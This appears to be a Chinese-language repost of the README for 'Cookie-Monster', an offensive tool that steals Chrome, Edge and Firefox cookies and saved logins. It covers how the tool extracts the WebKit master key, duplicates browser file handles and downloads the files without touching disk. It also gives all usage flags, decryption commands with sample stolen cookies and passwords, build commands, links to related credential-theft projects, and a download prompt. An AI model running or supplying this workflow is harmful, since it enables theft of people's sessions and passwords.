通过 BOF 或 exe窃取edge、chrome 和firefox的浏览器cookie !Cookie-Monster 将提取 WebKit 主密钥,找到具有 Cookies 和登录数据文件句柄的浏览器进程,复制句柄,然后无文件下载目标。下载 Cookies/登录数据文件后,python解密脚本可以帮助提取这些机密!Firefox 模块将解析profiles.ini 并找到 logins.json 和 key4.db 文件所在的位置并下载它们。引用单独的 github repo 进行离线解密。
转炉使用情况
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] <br>cookie-monster Example: <br> cookie-monster --chrome <br> cookie-monster --edge <br> cookie-moster --firefox <br> cookie-monster --chromeCookiePID 1337<br> cookie-monster --chromeLoginDataPID 1337<br> cookie-monster --edgeCookiePID 4444<br> cookie-monster --edgeLoginDataPID 4444<br>cookie-monster Options: <br> --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD <br> --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD <br> --firefox, looks for profiles.ini and locates the key4.db and logins.json file <br> --chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file<br> --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file <br> --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file<br> --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file <br>EXE 使用
Cookie Monster Example:<br> cookie-monster.exe --all <br>Cookie Monster Options:<br> -h, --help Show this help message and exit<br> --all Run chrome, edge, and firefox methods<br> --edge Extract edge keys and download Cookies/Login Data file to PWD<br> --chrome Extract chrome keys and download Cookies/Login Data file to PWD<br> --firefox Locate firefox key and Cookies, does not make a copy of either file<br>解密步骤
安装要求pip3 install -r requirements.txt<br>
对 webkit 主密钥进行 Base64 编码
python3 base64-encode.py "\xec\xfc...."<br>
解密 Chrome/Edge Cookies 文件
python .\decrypt.py "XHh..." --cookies ChromeCookie.db<br><br>Results Example:<br>-----------------------------------<br>Host: .<a href="http://github.com/" rel="nofollow">github.com</a><br>Path: /<br>Name: dotcom_user<br>Cookie: KingOfTheNOPs<br>Expires: Oct 28 2024 21:25:22<br><br>Host: <a href="http://github.com/" rel="nofollow">github.com</a><br>Path: /<br>Name: user_session<br>Cookie: x123.....<br>Expires: Nov 11 2023 21:25:22<br>
解密 Chome/Edge密码文件
python .\decrypt.py "XHh..." --passwords ChromePasswords.db<br><br>Results Example:<br>-----------------------------------<br>URL: <a href="https://test.com/" rel="nofollow">https://test.com/</a><br>Username: tester<br>Password: McTesty<br>
解密 Firefox Cookies 和存储的凭证:
https://github.com/lclevy/firepwd
安装
编译之前确保 Mingw-w64 和 make 已安装在 Linux 上。make<br>
在 windows 上编译 exe
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32<br>
待办事项
- 更新 decrypt.py 以支持基于firepwd的 Firefox并添加基于DonPAPI 的bruteforce 模块
参考
如果没有 Mr-Un1k0d3r 和他精彩的季节性视频的帮助,这个项目不可能完成!强烈建议查看他的课程!!!Cookie Webkit 主密钥提取器:https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
无文件下载:https://github.com/fortra/nanodump
解密 Cookies 和登录数据:https://github.com/login-securite/DonPAPI
下载 Cookie-Monster